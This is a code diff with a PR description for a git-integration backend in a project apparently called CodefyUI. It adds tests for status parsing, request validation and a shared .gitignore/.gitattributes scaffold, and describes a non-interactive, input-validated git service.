+    assert [f.orig_path for f in status.staged if f.kind == "renamed"] == [
+        "old.txt"]
+
+
+# --- kind_from_letter ------------------------------------------------------
+
+
+@pytest.mark.parametrize("letter,kind", [
+    ("M", "modified"), ("A", "added"), ("D", "deleted"),
+    ("R", "renamed"), ("C", "copied"), ("T", "typechange"),
+])
+def test_every_status_letter_has_a_kind(letter, kind):
+    assert kind_from_letter(letter) == kind
+
+
+@pytest.mark.parametrize("letter", ["X", ".", "", "u", "m"])
+def test_an_unexpected_letter_is_reported_as_modified(letter):
+    """git has grown letters before. Raising would turn one odd file into a
+    failed status read and dropping it would hide a change the user made;
+    "something changed here" is the one thing every letter has in common,
+    and the exact letters travel alongside in ``xy``."""
+    assert kind_from_letter(letter) == "modified"
+
+
+# --- the request models ----------------------------------------------------
+
+
+def test_paths_request_takes_a_list_of_paths():
+    request = PathsRequest(paths=["a.txt", "b/c.txt"])
+
+    assert request.paths == ["a.txt", "b/c.txt"]
+    assert request.all is False
+
+
+def test_paths_request_takes_the_whole_tree():
+    request = PathsRequest(all=True)
+
+    assert request.paths is None
+    assert request.all is True
+
+
+@pytest.mark.parametrize("body", [
+    pytest.param({}, id="neither"),
+    pytest.param({"paths": ["a.txt"], "all": True}, id="both"),
+    pytest.param({"paths": [], "all": True}, id="both-with-an-empty-list"),
+    pytest.param({"paths": []}, id="empty-list"),
+    pytest.param({"paths": None, "all": False}, id="spelled-out-neither"),
+])
+def test_paths_request_wants_exactly_one_form(body):
+    """``git add -A --`` with an empty pathspec stages the WHOLE tree, so
+    "nothing was selected" must never be able to arrive as "all" -- and a
+    body carrying both would otherwise be decided by whichever branch a
+    handler happened to test first."""
+    with pytest.raises(ValidationError):
+        PathsRequest(**body)
+
+
+def test_paths_request_refuses_a_key_nobody_defined():
+    """``extra="forbid"`` is what makes "the client cannot smuggle in an
+    argument" a property of the schema instead of of every handler."""
+    with pytest.raises(ValidationError):
+        PathsRequest(paths=["a.txt"], force=True)
+
+
+def test_commit_request_defaults_to_one_plain_commit():
+    request = CommitRequest(message="fix the thing")
+
+    assert (request.all, request.amend) == (False, False)
+
+
+def test_commit_request_refuses_a_key_nobody_defined():
+    with pytest.raises(ValidationError):
+        CommitRequest(message="x", author="someone else")
+
+
+def test_identity_request_may_set_one_field():
+    """The other stays unset rather than being cleared."""
+    request = IdentityRequest(email="me@example.com")
+
+    assert request.name is None
+    assert request.email == "me@example.com"
+
+
+def test_identity_request_refuses_a_key_nobody_defined():
+    with pytest.raises(ValidationError):
+        IdentityRequest(name="me", scope="global")
+
+
+def test_a_mutation_result_must_say_what_the_status_is():
+    """Required and nullable: a write that succeeded and could not be read
+    back is a real outcome, and the service has to say so on purpose rather
+    than by leaving a field out."""
+    with pytest.raises(ValidationError):
+        MutationResult()
+
+    assert MutationResult(status=None).changed_paths == []
+
+
+def test_an_empty_git_status_is_a_clean_repository():
+    """The default of every field is "git did not mention it"."""
+    status = GitStatus()
+
+    assert (status.staged, status.unstaged) == ([], [])
+    assert (status.untracked, status.conflicted) == ([], [])
+    assert status.branch is None and status.head is None
+    assert status.stash_count == 0
+    assert status.upstream_gone is False

--- a/backend/tests/test_git_status_parser.py
+++ b/backend/tests/test_git_status_parser.py
@@ -582,14 +582,18 @@ def test_identity_request_refuses_a_key_nobody_defined():
         IdentityRequest(name="me", scope="global")
 
 
-def test_a_mutation_result_must_say_what_the_status_is():
-    """Required and nullable: a write that succeeded and could not be read
-    back is a real outcome, and the service has to say so on purpose rather
-    than by leaving a field out."""
+def test_a_mutation_result_must_carry_the_fresh_status():
+    """Present AND not null. The frontend is typed from these models, so a
+    nullable status here would be a branch it has to handle and the service
+    is required never to produce; a write that cannot be read back
+    afterwards is a failed request, not a result with a hole in it."""
     with pytest.raises(ValidationError):
         MutationResult()
 
-    assert MutationResult(status=None).changed_paths == []
+    with pytest.raises(ValidationError):
+        MutationResult(status=None)
+
+    assert MutationResult(status=GitStatus()).changed_paths == []
 
 
 def test_an_empty_git_status_is_a_clean_repository():

--- a/backend/tests/test_project_scaffold.py
+++ b/backend/tests/test_project_scaffold.py
@@ -1,0 +1,78 @@
+"""One ``.gitignore`` and one ``.gitattributes``, whoever writes them.
+
+A project directory can become a git repository two ways now -- ``cdui
+project init`` at the command line, and the Source Control tab's
+"Initialize Repository" -- and the interesting failure is not that one of
+them writes the wrong text: it is that they DRIFT, so a project scaffolded
+by the CLI and a project scaffolded by the tab ignore different files, and
+the difference is only ever noticed by whoever commits their API keys.
+
+So these tests pin the shared constants (identity, not content: a copy that
+happens to match today is the drift these tests exist to prevent) and the
+one line in each file that would cost something if it went missing.
+
+``project`` here is ``scripts/project.py`` -- conftest puts ``scripts/`` on
+``sys.path``.
+"""
+
+from __future__ import annotations
+
+import argparse
+
+import project
+
+from app.core.project import PROJECT_GITATTRIBUTES, PROJECT_GITIGNORE
+
+
+def _args(**kw) -> argparse.Namespace:
+    ns = argparse.Namespace(dir=None, adopt=None, force=False)
+    for key, value in kw.items():
+        setattr(ns, key, value)
+    return ns
+
+
+def test_the_cli_writes_the_shared_scaffold():
+    """The SAME objects, not two copies that agree.
+
+    ``cdui project init`` is where these strings used to live; the tab's
+    ``init`` needs the same ones, and a second copy would be a second
+    ``.gitignore`` waiting to lose a line.
+    """
+    assert project.PROJECT_GITIGNORE is PROJECT_GITIGNORE
+    assert project.PROJECT_GITATTRIBUTES is PROJECT_GITATTRIBUTES
+
+
+def test_the_scaffolded_gitignore_still_hides_the_secrets(tmp_path):
+    """``.env`` first, and the model formats after it.
+
+    ``.env`` is the whole reason the tab refuses to serve that file at any
+    ref: a secret that is never committed cannot be read out of history.
+    """
+    target = tmp_path / "svc"
+
+    assert project.cmd_init(_args(dir=str(target))) == 0
+
+    ignored = (target / ".gitignore").read_text(encoding="utf-8").splitlines()
+    assert ".env" in ignored
+    assert "*.safetensors" in ignored
+    # An interrupted atomic write leaves one of these behind; a project that
+    # tracked them would commit half a graph.
+    assert "*.tmp-*" in ignored
+
+
+def test_the_scaffolded_gitattributes_pins_json_line_endings(tmp_path):
+    """``*.json text eol=lf`` -- the line this change added.
+
+    The graph and layout files ARE the project's source and the server
+    writes them with ``\\n``. On a Windows checkout with
+    ``core.autocrlf=true``, without this line every save rewrites every line
+    of every graph, and a one-node change is reviewed as a whole-file diff.
+    """
+    target = tmp_path / "svc"
+
+    assert project.cmd_init(_args(dir=str(target))) == 0
+
+    attributes = (target / ".gitattributes").read_text(
+        encoding="utf-8").splitlines()
+    assert "*.json text eol=lf" in attributes
+    assert "layout/*.layout.json linguist-generated=true" in attributes

--- a/scripts/project.py
+++ b/scripts/project.py
@@ -40,6 +40,8 @@ from app.core.plugin_loader import (
     load_lockfile,
 )
 from app.core.project import (
+    PROJECT_GITATTRIBUTES,
+    PROJECT_GITIGNORE,
     GraphAmbiguityError,
     check_pin_issues,
     collect_graph_files,
@@ -61,22 +63,6 @@ requires_codefyui = ">=1.4"   # advisory metadata; NOT enforced
 # slug = "my-service"
 # record_io = true
 """
-
-_GITIGNORE = """.env
-*.pt
-*.pth
-*.safetensors
-*.onnx
-*.ckpt
-*.pkl
-__pycache__/
-*.db
-.DS_Store
-# interrupted atomic writes
-*.tmp-*
-"""
-
-_GITATTRIBUTES = "layout/*.layout.json linguist-generated=true\n"
 
 _ENV_EXAMPLE = """# CodefyUI project secrets (runtime only). Copy to .env and fill in.
 # .env is gitignored; this .env.example is committed as the required-keys template.
@@ -178,8 +164,10 @@ def cmd_init(args: argparse.Namespace) -> int:
     # Scaffold files (never clobber an existing manifest/README under --force).
     name = target.name
     _write_if_absent(target / MANIFEST_FILENAME, _PROJECT_TOML.format(name=name))
-    _write_if_absent(target / ".gitignore", _GITIGNORE)
-    _write_if_absent(target / ".gitattributes", _GITATTRIBUTES)
+    # Shared with the Source Control tab's own "Initialize Repository", which
+    # writes the same two files from the same constants (app.core.project).
+    _write_if_absent(target / ".gitignore", PROJECT_GITIGNORE)
+    _write_if_absent(target / ".gitattributes", PROJECT_GITATTRIBUTES)
     _write_if_absent(target / ".env.example", _ENV_EXAMPLE)
     _write_if_absent(target / "README.md", _README.format(name=name))
 


### PR DESCRIPTION
﻿> 中文摘要：這是「版本控制分頁」計畫的第一個後端 PR。新增 `backend/app/core/git/`（唯一一個會啟動 git 行程的執行器、結構化的錯誤分類、嚴格的輸入驗證、porcelain v2 狀態解析、服務層）與 `/api/git` 路由（狀態、暫存／取消暫存／捨棄、提交與 amend、初始化、提交身分、歷史、每個提交的檔案清單、差異與指定版本的檔案內容）。只對「開啟中的專案目錄」操作，用主機自己的 git 與憑證、完全非互動（缺憑證會立刻回明確錯誤，不會卡住伺服器）、每個路徑／參照／訊息都先驗證再進 argv、絕不經過 shell；寫入路由只需要 session token（依你的決定，區網存取由 IT 管）。`.env` 類檔案在任何版本都不會被讀出；透過連結（symlink／junction）的讀寫一律拒絕。分支、遠端、儲藏與側邊欄畫面在後續 PR。

## What / Why

Part 1 of the Source Control sidebar tab (G1 of the approved Plugin Center + Source Control wave). Today a project
directory is a git repository, but the editor has no way to see or commit its state. This PR ships the backend: the
git service and the read / stage / commit / init / diff / log routes. Branches, remotes, stashes, network operations
and the sidebar tab itself follow in G2-G4.

Design points (all measured against the host's git 2.53):

- One place spawns git (`core/git/runner.py`): fixed prefix `--literal-pathspecs -c core.quotepath=false -c
  core.askPass= -c color.ui=never`, a non-interactive environment (`GIT_TERMINAL_PROMPT=0`, `GCM_INTERACTIVE=never`,
  `SSH_ASKPASS_REQUIRE=never`, `GIT_EDITOR=:`, `LC_ALL=C`, `GIT_ALLOW_PROTOCOL=https:ssh:file`, `-oBatchMode=yes` when
  no ssh command is configured), binary pipes, a per-class timeout that kills the process tree, never a shell.
- Structured errors: every failure is a `GitError(code, status)` from an ordered stderr classifier (`auth_required`,
  `network`, `non_fast_forward`, `diverged`, `conflict`, `dirty_tree`, `nothing_to_commit`, `identity_missing`, ...);
  git's own text is kept as a tail and credentials are redacted before anything reaches a response.
- Closed grammars for every input (paths: POSIX, relative, no `..`, no leading `-`, no `:`, resolved inside the
  project; branch names; remote names and URLs; messages; identity; shas). The tab never operates on an enclosing
  repository (`not_repo` with `nested_toplevel`) and answers `no_project` outside project mode.
- Reads: `.env` / `.env.*` (except `.env.example`) are refused at any ref and in any path segment; a diff names exactly
  one file (a tree on either side is refused, which is what closes directory and blob-vs-tree pathspecs); reads through
  a symlink or junction are refused; writes refuse paths whose parents are links; submodules are refused; conflicted
  files diff normally.
- `cdui project init` and the new `POST /api/git/init` share one scaffold (`core/project.py`); `.gitattributes` now
  pins `*.json text eol=lf` so a Windows checkout never shows phantom JSON diffs.

## Closes / relates to

Part of the Plugin Center + Source Control wave (no issue number; the wave plan is the authority). Stays open:
branches / remotes / stashes / fetch / pull / push (G3), history + diff viewer (G4), the sidebar tab (G2).

## Test evidence

```
cd backend && .venv\Scripts\python.exe -m pytest -q -p no:cacheprovider tests
  -> 6961 passed, 26 skipped, 23 warnings   (main at 115b628 on this box: 6393 passed, 26 skipped, 23 warnings; +568 tests, warnings unchanged)
uvx ruff check .                            -> All checks passed!
python scripts/check_control_bytes.py       -> OK
grep for conflict markers in CHANGELOG.md   -> 0 lines
```

Every task was implemented by a fresh subagent, task-reviewed (spec + quality) with fix rounds, and the whole branch
got three area reviews plus one fix wave with a scoped re-review. The service tests run against real temporary
repositories with the developer's git configuration isolated; the API tests drive the real app through the test
client. Adversarial matrices (glob and directory pathspecs, blob-vs-tree shapes, symlinks, Windows junctions,
conflicts, submodules) are part of the suite.

## Checklist

- [x] Commits are signed off (`git commit -s`) per CONTRIBUTING.md's DCO section.
- [x] If I changed a docs page or a node-param description, I updated its zh-TW twin in the same PR (no docs page
      changed; the docs page for the tab lands with the frontend PR).
- [x] No pictographic emoji in code, logs, UI strings, or this PR body.
- [x] I explained what I deliberately did not do: no loopback guard on git writes (the user's decision); no merge
      editor, force push, rebase, or clone; a hard link is not detectable and is out of scope (it needs local write
      access, which already equals copying the file); the CLI/server lockfile race and the SPA fallback's NUL path
      are unrelated follow-ups. Known and parked for the next git PR: "unstage all" of a staged rename leaves its deletion half staged (a second click converges); a blob over the 2 MiB cap read at a ref reports `truncated` with empty text and `binary=false` (its bytes are never read).
